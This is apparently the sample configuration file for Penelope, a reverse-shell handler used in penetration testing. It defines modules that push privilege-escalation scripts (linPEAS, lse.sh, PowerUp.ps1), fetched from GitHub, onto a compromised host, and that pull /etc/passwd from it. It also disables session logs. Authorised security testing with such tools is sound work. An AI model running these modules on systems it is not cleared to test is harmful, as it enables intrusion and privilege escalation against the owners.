# Penelope options
[options]
modules = {
	'upload_privesc_scripts':{
		'description':'Upload privilege escalation scripts to the target',
		'actions':{
			'Unix':[
				'upload https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh',
				'upload https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh'
			],
			'Windows':[
				'upload https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'
			]
		}
	},
	'new_custom_module':{
		'description':'This is an example new module',
		'actions':{
			'Unix':[
				'maintain 3', # maintain 3 active sessions
				'download /etc/issue /etc/passwd'
			],
			'Windows':[
			]
		}
	}
	}
# All options that are appeared with the SET menu command can be overriden here. Some examples:
no_log = True                          # Do not create session log files.   -> Default: False
#escape = {'sequence':b'~', 'key':'~'}  # Use tilde for escaping PTY         -> Default: {'sequence':b'\x1b[24~', 'key':'F12'}
#basedir = Path("/tmp/penelope")        # Change the base directory          -> Default: Path("~/.penelope")
port = 1337                            # Change the default listener port   -> Default: 4444
